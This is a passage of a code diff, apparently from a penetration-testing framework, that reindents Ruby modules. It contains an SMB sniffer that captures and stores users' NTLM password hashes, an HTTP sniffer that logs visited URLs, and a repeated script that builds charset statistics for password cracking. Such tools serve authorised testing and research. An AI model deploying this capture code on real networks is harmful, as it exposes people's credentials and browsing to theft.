"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
|
||||
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
|
||||
"SERVER CHALLENGE:#{s[:challenge]} " +
|
||||
"\nLMHASH:#{s[:lmhash]} " +
|
||||
"\nNTHASH:#{s[:ntlmhash]}\n"
|
||||
print_status(logmessage)
|
||||
|
||||
src_ip = s[:client_host]
|
||||
dst_ip = s[:host]
|
||||
# know this is ugly , last code added :-/
|
||||
smb_db_type_hash = case ntlm_ver
|
||||
when "NTLMv1" then "smb_netv1_hash"
|
||||
when "NTLM2_SESSION" then "smb_netv1_hash"
|
||||
when "NTLMv2" then "smb_netv2_hash"
|
||||
end
|
||||
# DB reporting
|
||||
report_auth_info(
|
||||
:host => dst_ip,
|
||||
:port => 445,
|
||||
:sname => 'smb',
|
||||
:user => s[:user],
|
||||
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
|
||||
:type => smb_db_type_hash,
|
||||
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
|
||||
:active => true
|
||||
)
|
||||
src_ip = s[:client_host]
|
||||
dst_ip = s[:host]
|
||||
# know this is ugly , last code added :-/
|
||||
smb_db_type_hash = case ntlm_ver
|
||||
when "NTLMv1" then "smb_netv1_hash"
|
||||
when "NTLM2_SESSION" then "smb_netv1_hash"
|
||||
when "NTLMv2" then "smb_netv2_hash"
|
||||
end
|
||||
# DB reporting
|
||||
report_auth_info(
|
||||
:host => dst_ip,
|
||||
:port => 445,
|
||||
:sname => 'smb',
|
||||
:user => s[:user],
|
||||
:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
|
||||
:type => smb_db_type_hash,
|
||||
:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
|
||||
:active => true
|
||||
)
|
||||
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_peer_os",
|
||||
:data => s[:peer_os]
|
||||
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_peer_os",
|
||||
:data => s[:peer_os]
|
||||
) if (s[:peer_os] and s[:peer_os].strip.length > 0)
|
||||
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_peer_lm",
|
||||
:data => s[:peer_lm]
|
||||
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_peer_lm",
|
||||
:data => s[:peer_lm]
|
||||
) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
|
||||
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_domain",
|
||||
:data => s[:domain]
|
||||
) if (s[:domain] and s[:domain].strip.length > 0)
|
||||
report_note(
|
||||
:host => src_ip,
|
||||
:type => "smb_domain",
|
||||
:data => s[:domain]
|
||||
) if (s[:domain] and s[:domain].strip.length > 0)
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
s[:last] = nil
|
||||
sessions.delete(s[:session])
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
s[:last] = nil
|
||||
sessions.delete(s[:session])
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,43 +6,43 @@
|
|||
|
||||
# Sniffer class for GET URL's
|
||||
class SnifferURL < BaseProtocolParser
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
|
||||
:webhost => /^HOST\:\s+([^\n\r]+)/i,
|
||||
}
|
||||
end
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
|
||||
:webhost => /^HOST\:\s+([^\n\r]+)/i,
|
||||
}
|
||||
end
|
||||
|
||||
def parse(pkt)
|
||||
# We want to return immediantly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
|
||||
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
def parse(pkt)
|
||||
# We want to return immediantly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80)
|
||||
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
|
||||
self.sigs.each_key do |k|
|
||||
self.sigs.each_key do |k|
|
||||
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end
|
||||
|
||||
case matched
|
||||
when :webhost
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
if(s[:get])
|
||||
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
|
||||
sessions.delete(s[:session])
|
||||
return
|
||||
end
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
case matched
|
||||
when :webhost
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
if(s[:get])
|
||||
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
|
||||
sessions.delete(s[:session])
|
||||
return
|
||||
end
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end # end of URL sniffer
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
